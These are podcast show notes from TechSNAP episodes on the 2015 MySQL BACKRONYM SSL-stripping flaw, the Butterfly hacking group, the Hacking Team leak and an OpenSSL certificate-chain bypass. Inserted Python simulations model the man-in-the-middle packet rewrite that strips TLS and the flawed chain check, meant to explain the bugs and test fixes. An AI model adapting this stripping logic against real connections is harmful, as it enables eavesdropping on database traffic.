Butterflies & Backronyms | TechSNAP 224 https://original.jupiterbroadcasting.net/85537/butterflies-backronyms-techsnap-224/ Thu, 23 Jul 2015 09:42:38 +0000 https://original.jupiterbroadcasting.net/?p=85537 The Backronym vulnerability hits MySQL right in the SSL protection, we’ll share the details. The hacker Group that hit Apple & Microsoft intensifies their attacks & a survey shows many core Linux tools are at risk. Plus some great questions, a rockin’ roundup & much much more! Thanks to: Get Paid to Write for DigitalOcean […]

The post Butterflies & Backronyms | TechSNAP 224 first appeared on Jupiter Broadcasting.

The Backronym vulnerability hits MySQL right in the SSL protection, we’ll share the details. The hacker Group that hit Apple & Microsoft intensifies their attacks & a survey shows many core Linux tools are at risk.

Plus some great questions, a rockin’ roundup & much much more!

Thanks to:


DigitalOcean


Ting


iXsystems

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Backronym – ssl stripping mysql connections

  • Researchers have identified a serious vulnerability in some versions of MySQL that allows an attacker to strip SSL/TLS connections of their security wrapping transparently.
  • Researchers at Duo Security realized that even when they set the correct option to initiate an SSL connection with the MySQL server, they could not make the client enforce a secure connection.
  • This means that an attacker with a man-in-the-middle position could force an unencrypted connection and passively sniff all of the unencrypted queries from the client to the MySQL database.
  • The vulnerability (CVE-2015-3152) lies in the behaviour of the ‘--ssl’ client option, which affected versions treat as “advisory”: the client attempts to negotiate SSL/TLS with the server but does not require it. A man-in-the-middle can therefore transparently “strip” the SSL/TLS protection by rewriting the server’s handshake so that it no longer advertises SSL/TLS support, and the client silently continues in cleartext.
  • The issue affects the ssl client option whether it is used directly or triggered automatically by the use of other ssl options.
  • The vulnerability affects MySQL 5.7.2 and earlier, MySQL Connector/C 6.1.2 and earlier, all versions of Percona Server and all versions of MariaDB.
  • The Duo researchers nicknamed the vulnerability BACKRONYM (Bad Authentication Causes Kritical Risk Over Networks, Yikes MySQL!) and put up a site that riffs on the recent trend of researchers building sites for major vulnerabilities.
  • They say: “We spent countless hours analyzing the BACKRONYM vulnerability to come up with a human-readable description that would convey the underlying root-cause to infosec professionals.”
  • What do I need to do to fix BACKRONYM?
  • Step 1: PANIC! I mean look at that logo – your database is basically exploding!
  • Step 2: Tell all your friends about BACKRONYM. Use your thought leadership talents to write blog post about BACKRONYM to reap sweet Internet karma. Leverage your efforts in responding to BACKRONYM to build political capital with the executives in your organization. Make sure your parents know it’s not safe to shop online until BACKRONYM is eradicated.
  • Step 3: Actually remediate the vulnerability in any of your affected MySQL client-side libraries (also MariaDB and Percona). Unfortunately, there’s no patch backported for MySQL <= 5.7.2. So if you’re on MySQL 5.6 like 99.99% of the Internet is, you’re basically out of luck and have to upgrade to the MySQL 5.7 “preview release” or figure out how to pull in libmysqlclient >= 6.1.3. Backporting security fixes is hard, apparently.
  • Additional Coverage: New PHP release to fix backronym flaw
  • The BACKRONYM Vulnerability
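To make the “advisory” behaviour concrete, here is an added example (my own code, not Duo’s and not MySQL’s) that builds a constructed MySQL protocol-v10 server greeting, applies the capability-flag rewrite a man-in-the-middle performs, and contrasts a client that treats --ssl as advisory with one that requires TLS. The packet layout follows the MySQL client/server protocol; the mode names “advisory” and “required” are my labels for the two behaviours, not MySQL option values, and the greeting is a constructed sample rather than a capture.

```python
import struct

# Capability bits from the MySQL client/server protocol. CLIENT_SSL is the
# one a server sets in its greeting when it is willing to do SSL/TLS.
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SSL = 0x00000800
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PS_MULTI_RESULTS = 0x00040000


def build_greeting(server_version: bytes, caps: int) -> bytes:
    """Build a minimal protocol-v10 server greeting (constructed sample).
    Returns the 4-byte packet header followed by the greeting body."""
    body = b"\x0a" + server_version + b"\x00"   # protocol 10, NUL-terminated version
    body += struct.pack("<I", 7)                # connection id
    body += b"A" * 8 + b"\x00"                  # auth-plugin-data part 1, filler
    body += struct.pack("<H", caps & 0xFFFF)    # capability flags, lower 16 bits
    body += b"\x21"                             # character set (utf8_general_ci)
    body += struct.pack("<H", 0x0002)           # status flags (SERVER_STATUS_AUTOCOMMIT)
    body += struct.pack("<H", caps >> 16)       # capability flags, upper 16 bits
    body += b"\x00" + b"\x00" * 10              # auth data length (no CLIENT_PLUGIN_AUTH), reserved
    body += b"B" * 12 + b"\x00"                 # auth-plugin-data part 2
    header = len(body).to_bytes(3, "little") + b"\x00"   # payload length, sequence id 0
    return header + body


def _caps_offset(body) -> int:
    """Offset of the lower capability flags inside the greeting body."""
    version_end = body.index(b"\x00", 1)        # end of the NUL-terminated version string
    return version_end + 1 + 4 + 8 + 1          # skip connection id, auth data 1, filler


def parse_capabilities(packet: bytes) -> int:
    """Read the 32-bit capability flags the server advertised."""
    length = int.from_bytes(packet[:3], "little")
    body = packet[4:4 + length]
    if body[0] != 0x0a:
        raise ValueError("not a protocol-v10 greeting")
    pos = _caps_offset(body)
    lower = struct.unpack_from("<H", body, pos)[0]
    upper = struct.unpack_from("<H", body, pos + 2 + 1 + 2)[0]   # past charset and status flags
    return lower | (upper << 16)


def strip_ssl(packet: bytes) -> bytes:
    """The man-in-the-middle's rewrite: clear CLIENT_SSL so the server appears
    not to support TLS. Packet length and sequence id are unchanged."""
    body = bytearray(packet[4:])
    pos = _caps_offset(body)
    lower = struct.unpack_from("<H", body, pos)[0] & ~CLIENT_SSL & 0xFFFF
    struct.pack_into("<H", body, pos, lower)
    return packet[:4] + bytes(body)


def client_decision(packet: bytes, mode: str) -> str:
    """'advisory' models the pre-fix --ssl behaviour: use TLS only if the
    server advertises it, otherwise silently continue in cleartext.
    'required' models an enforcing client: no CLIENT_SSL means no connection."""
    caps = parse_capabilities(packet)
    if caps & CLIENT_SSL:
        return "tls"
    if mode == "required":
        return "refused"
    return "cleartext"


if __name__ == "__main__":
    greeting = build_greeting(b"5.6.25", CLIENT_PROTOCOL_41 | CLIENT_SSL
                              | CLIENT_SECURE_CONNECTION | CLIENT_PS_MULTI_RESULTS)
    tampered = strip_ssl(greeting)
    for mode in ("advisory", "required"):
        print(mode, "untampered:", client_decision(greeting, mode),
              "stripped:", client_decision(tampered, mode))
```

The interesting row is the stripped greeting: the advisory client reports “cleartext” and would happily send its queries unencrypted, while the enforcing client refuses. The practical check on a real deployment is the same idea in reverse: point the client at a server that does not offer TLS and confirm the connection fails rather than falling back.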

Hacker Group That Hit Twitter, Facebook, Apple and Microsoft Intensifies Attacks

  • The hacker group, which security researchers from Kaspersky Lab and Symantec call Wild Neutron or Morpho, has broken into the networks of over 45 large companies since 2012.
  • After the 2013 attacks against Twitter, Facebook, Apple and Microsoft were highly publicized, the group went underground and temporarily halted its activity.
  • Symantec has named the group behind the attacks “Butterfly”.
  • Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target.
  • The first signs of Butterfly’s activities emerged in early 2013 when several major technology and internet firms were compromised. Twitter, Facebook, Apple and Microsoft disclosed that they had been compromised by very similar attacks. This was done by compromising a website used by mobile developers (that we covered before on the show) using a Java zero-day exploit to infect them with malware.
  • The malware used in these attacks was a Mac OS X back door known as OSX.Pintsized. Subsequent analysis by security researcher Eric Romang identified a Windows back door, Backdoor.Jiripbot, which was also used in the attacks.
  • Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly.
  • Butterfly has also shown an interest in the commodities sector, attacking two major companies involved in gold and oil in late 2014. In addition to this, the Central Asian offices of a global law firm were compromised in June 2015. The company specializes in finance and natural resources specific to that region. The latter was one of at least three law firms the group has targeted over the past three years.
  • Butterfly has also developed a number of its own hacking tools. Hacktool.Securetunnel is a modified version of OpenSSH which contains additional code to pass a command-and-control (C&C) server address and port to a compromised computer.
  • Hacktool.Bannerjack is meanwhile used to retrieve default messages issued by Telnet, HTTP, and generic Transmission Control Protocol (TCP) servers. Symantec believes it is used to locate any potentially vulnerable servers on the local network, likely including printers, routers, HTTP servers, and any other generic TCP server.
  • The group uses Hacktool.Eventlog to parse event logs, dumping out ones of interest, and delete entries. It also kills processes and performs a secure self-delete. Hacktool.Proxy.A is used to create a proxy connection that allows attackers to route traffic through an intermediary node, onto their destination node.
  • Based on the profile of the victims and the type of information targeted by the attackers, Symantec believes that Butterfly is financially motivated, stealing information it can potentially profit from. The group appears to be agnostic about the nationality of its targets, leading us to believe that Butterfly is unaffiliated to any nation state.
  • Links:
  • Butterfly: Profiting from high-level corporate attacks | Symantec Connect Community
  • Hacktool.Securetunnel | Symantec
  • Wild Neutron – Economic espionage threat actor returns with new tricks – Securelist

Core Linux tools top list of most at-risk software

  • The CII (Core Infrastructure Initiative), a Linux Foundation effort assembled in the wake of the Heartbleed fiasco to provide development support for key Internet protocols, has opened the doors on its Census Project — an effort to figure out what projects need support now, instead of waiting for them to break.
  • The Census, with both its code and results available on GitHub, assembles metrics about open source projects found in Debian Linux’s package list and on openhub.net, then scores them based on the amount of risk each presents.
  • A copy of the census data downloaded from GitHub on Friday morning showed 395 projects in the census, with the top-listed projects to be core Linux utilities. Ftp, netcat-traditional, tcpd, and whois all scored 11 out of a possible 15.
  • High scores in the survey, said the CII in its page on the project, don’t mean a given program should be ditched, or that it’s to be presumed vulnerable. Rather, it means “the project may not be getting the attention that it deserves and that it merits further investigation.”
  • Apache’s httpd Web server, a large and “vitally important” project with many vulnerabilities tracked over the years, ranked as an 8 in part because “there’s already a large development & review team in place.”
  • Busybox, a project found in many embedded Linux applications that has been implicated before with security concerns, ranked even lower, at 6.
  • One of the tricky issues that bubbles up is the complication posed by dependencies between projects. For the libaprutil1-ldap project (with a score of 8), the notes indicate that “the general Apache Portable Runtime (APR) appears to be actively maintained. However, it’s not as clear that the LDAP library in it is as actively managed.” Likewise, anything that uses the Kerberos authentication system — recently implicated in a security issue — typically has “Kerberos” in the notes.
  • linuxfoundation/cii-census · GitHub

Feedback:


Round Up:


ZFS does not prevent Stupidity | TechSNAP 222 https://original.jupiterbroadcasting.net/85007/zfs-does-not-prevent-stupidity-techsnap-222/ Thu, 09 Jul 2015 16:46:33 +0000 https://original.jupiterbroadcasting.net/?p=85007 From hacking to hacked, hacking team gets owned & what gets leaked is the best part, we’ll share the details. Plus, a new OpenSSL vulnerability revealed, Apple tweaks their two factor authentication.. Your questions, our answers & much much more! Thanks to: Get Paid to Write for DigitalOcean Direct Download: HD Video | Mobile Video […]

The post ZFS does not prevent Stupidity | TechSNAP 222 first appeared on Jupiter Broadcasting.

From hacking to hacked, hacking team gets owned & what gets leaked is the best part, we’ll share the details.

Plus, a new OpenSSL vulnerability revealed, Apple tweaks their two factor authentication.. Your questions, our answers & much much more!

Thanks to:


DigitalOcean


Ting


iXsystems

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Italian intrusion software vendor Hacking Team Breached, Data Released

  • Hacking Team, a vendor known for selling spyware to governments, suffered a serious data breach
  • The incident came to light Sunday evening when unnamed attackers released a torrent with roughly 400 GB of data purported to be taken from Hacking Team’s network.
  • Among the more potentially damaging documents made public are invoices showing that Hacking Team has sold its intrusion software to government agencies in countries known to have oppressive regimes, including Sudan, Ethiopia, and Egypt.
  • Researchers at Trend Micro have analyzed the leaked data and uncovered several exploits, including a zero-day for Adobe Flash Player.
  • A readme document found alongside proof-of-concept (PoC) code for the Flash Player zero-day describes the vulnerability as “the most beautiful Flash bug for the last four years since CVE-2010-2161.”
  • Adobe released a patch on July 7th 2015
  • Researchers also found that the Adobe Flash zero-day had already been used in the wild.
  • “In late June, we learned that a user in Korea was the attempted target of various exploits, including CVE-2014-0497, a Flash vulnerability discovered last year,” threat analyst Weimin Wu explains.
  • The exploit was used to download a Trojan on the target’s computer, which then proceeds to download several other malicious payloads and create malicious processes.
  • In addition to the Flash Player exploit, Trend Micro said it also spotted an exploit for a Windows kernel zero-day vulnerability in the Hacking Team leak.
  • Did the “Hacking Team” find these zero days themselves? With the intent to sell them? Or did they discover them being used by others, and then added them to their own arsenal? Why were they not reported to the vendors?
  • Additional Coverage: Hacking Team’s Flash 0-day exploit used against Korean targets before it was leaked
  • Additional Coverage: Security Week
  • Additional Coverage: CSO Online
  • Additional Coverage: Net Security
  • Additional Coverage: Daily Dot
  • Additional Coverage: Threat Post — Update: Hacking Team to continue operations
  • Hacking Team bought Flash 0-days from Russian hacker

iOS 9 will drop the recovery key from two-factor authentication

  • After a hacker used social engineering against Apple Support to take over the Apple ID of Mat Honan, a Wired.com reporter, in order to take over his coveted 3-letter Twitter handle, everyone raced to set up two-factor authentication for their Apple ID
  • The hacker was able to remotely erase Honan’s iPhone and iPad, destroying personal data, family photos, and all other content.
  • The hacker was able to reset the password for the Apple ID account by socially engineering the support operator at Apple, using information gathered from public data and from a hacked Amazon account
  • In the aftermath, Apple promised to increase training of its support operators and improve security
  • As part of this, when you enable two factor authentication, Apple issues you a recovery key. A short text string that you should print and store in a safe place
  • Without it, you cannot recover your account if you lose the password
  • This system is far more secure, but it has its drawbacks
  • Journalist loses recovery key, and Apple ID
  • If you, like Owen from the link above, lose your recovery key, and your account is compromised or you lose your password, you have no way to get it back
  • Apple has drawn a hard line in the sand: for the sake of security, they cannot recover an account without that recovery key. You specifically asked to be protected from impersonation etc.
  • In the wake of scandals such as “the fappening”, this strong stance on security makes sense
  • However, Apple has decided to abandon it, because, as always, they are more focused on customer satisfaction than security.
  • But, can you blame them?
  • “Apple said at WWDC it would build a more integrated and comprehensive two-factor security system into its next OS releases”
  • “Among other changes, the Recovery Key option that has tripped up users in the past, and led in some cases to users having to abandon an Apple ID as permanently unavailable, has been removed, an Apple spokesperson confirmed. With the new system, Apple customer support will work through a detailed recovery process with users who lose access to all their trusted devices and phone numbers.”
  • Apple has posted more details about the new system on their Developer site

OpenSSL vuln revealed, while critical, not widespread. All that hype for nothing

  • “During certificate verification, OpenSSL will attempt to find an alternative certificate chain if the first attempt to build such a chain fails. An error in the implementation of this logic can mean that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and “issue” an invalid certificate. This issue was reported to OpenSSL by Adam Langley/David Benjamin (Google/BoringSSL).”
  • Impact: “An attacker could cause certain checks on untrusted certificates, such as the CA (certificate authority) flag, to be bypassed, which would enable them to use a valid leaf certificate to act as a CA and issue an invalid certificate.”
  • If you installed the OpenSSL update from June 11th (1.0.2b / 1.0.1n, the release that among other things blocks DH parameters shorter than 768 bits), your system is affected: the alternative-chain logic was introduced in that release, so older builds never had the bug.
  • This issue (CVE-2015-1793) affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n and 1.0.1o.
    • OpenSSL 1.0.2b/1.0.2c users should upgrade to 1.0.2d
    • OpenSSL 1.0.1n/1.0.1o users should upgrade to 1.0.1p
  • Older versions of OpenSSL (1.0.0 and 0.9.8) are not affected, but reminder: support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015
  • This suggests further that OpenSSL needs to separate new features from bug and security fix releases
  • Why are any new features being added to OpenSSL 1.0.1?
  • Shouldn’t all new development happen only in the bleeding edge version?
  • Why has a sane release model not been adopted yet?
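As an added illustration (my own simplified model, not OpenSSL’s code), the following path builder reproduces the alternative-chain logic described above. The first attempt extends the chain from the trust store and fails because the trusted intermediate’s issuer is missing; the alternative-chain search then pops certificates off the top. The vulnerable variant decrements the “last untrusted” index for every popped certificate, including the one that came from the trust store, so the CA-flag check, which only runs over untrusted certificates, skips the valid non-CA leaf that the attacker is using as a CA. The fixed variant resets the index to the chain length after popping. The certificate names and scenario are constructed, and signature checks are omitted (issuers are matched by name only).

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Cert:
    """Minimal stand-in for an X.509 certificate (constructed, no keys or signatures)."""
    subject: str
    issuer: str
    is_ca: bool = True        # basicConstraints CA flag
    trusted: bool = False     # True if this copy lives in the trust store

    @property
    def self_signed(self) -> bool:
        return self.subject == self.issuer


def find_issuer(cert, pool):
    """Name-based issuer lookup (stands in for get_issuer / check_issued)."""
    for cand in pool:
        if cand.subject == cert.issuer:
            return cand
    return None


def verify(leaf, untrusted, store, fixed):
    """Model of the 1.0.1n/1.0.2b chain builder with alternative chains.
    Returns (result, chain, last_untrusted)."""
    chain = [leaf]
    # 1. extend with peer-supplied (untrusted) certificates
    while not chain[-1].self_signed:
        nxt = find_issuer(chain[-1], untrusted)
        if nxt is None or nxt in chain:
            break
        chain.append(nxt)
    last_untrusted = len(chain)   # everything so far came from the peer
    j = len(chain)                # cursor for the alternative-chain search

    while True:
        # 2. extend from the trust store until self-signed or stuck
        while not chain[-1].self_signed:
            nxt = find_issuer(chain[-1], store)
            if nxt is None or nxt in chain:
                break
            chain.append(nxt)
        if chain[-1].self_signed and chain[-1].trusted:
            break                                   # reached a trusted root
        # 3. no trust anchor: look for an alternative chain lower down
        retry = False
        while j > 1:
            j -= 1
            if find_issuer(chain[j - 1], store) is not None:
                while len(chain) > j:
                    chain.pop()
                    if not fixed:
                        last_untrusted -= 1        # BUG: also counts certs that came from the store
                if fixed:
                    last_untrusted = len(chain)    # everything left is peer-supplied
                retry = True
                break
        if not retry:
            return "unable to get issuer certificate", chain, last_untrusted

    # 4. check_chain_extensions: the CA flag is checked on untrusted certs only
    for i in range(1, last_untrusted):
        if not chain[i].is_ca:
            return f"invalid CA certificate: {chain[i].subject}", chain, last_untrusted
    return "ok", chain, last_untrusted


def demo(fixed):
    """Constructed scenario: Root is absent from the store; Inter is a trusted
    but not self-signed cert; SubInter exists both as an untrusted cert and as
    a trusted self-signed copy; Leaf is a valid non-CA cert whose key the
    attacker holds and uses to 'issue' Bad."""
    inter = Cert("Inter", "Root", trusted=True)
    subinter = Cert("SubInter", "Inter")
    subinter_ss = Cert("SubInter", "SubInter", trusted=True)
    leaf = Cert("Leaf", "SubInter", is_ca=False)
    bad = Cert("Bad", "Leaf", is_ca=False)
    return verify(bad, untrusted=[leaf, subinter], store=[subinter_ss, inter], fixed=fixed)


if __name__ == "__main__":
    for fixed in (False, True):
        result, chain, lu = demo(fixed)
        print("fixed" if fixed else "vulnerable", result,
              [c.subject for c in chain], "last_untrusted =", lu)
```

With the bug, the final chain Bad → Leaf → SubInter(trusted) verifies with last_untrusted = 1, so Leaf is never checked for the CA flag; with the fix, last_untrusted = 2 and verification fails on Leaf. The two store certificates are there only to make the first attempt reach the store and then fail, which is exactly what forces the alternative-chain code path.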

Feedback:


Round Up:

Encryption McCarthyism | Unfilter 150 https://original.jupiterbroadcasting.net/84917/encryption-mccarthyism-unfilter-150/ Wed, 08 Jul 2015 21:52:53 +0000 https://original.jupiterbroadcasting.net/?p=84917 In the fight against ISIS, the FBI is making the case for US tech companies to build-in backdoors to their encryption across the board. At the same time new legislation compels social media companies to report all terrorism related activities. We’ll look at the big picture & the trends that have been leading to this. […]

The post Encryption McCarthyism | Unfilter 150 first appeared on Jupiter Broadcasting.

In the fight against ISIS, the FBI is making the case for US tech companies to build-in backdoors to their encryption across the board. At the same time new legislation compels social media companies to report all terrorism related activities. We’ll look at the big picture & the trends that have been leading to this.

Plus the first possible olive branch has been extended to Edward Snowden, an update on Greece, the NYSE goes down & much more!

Direct Download:

Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

Video Feed | MP3 Feed | OGG Feed | HD Torrent | Mobile Torrent | iTunes

Become an Unfilter supporter on Patreon:

Show Notes:

— Episode Links —
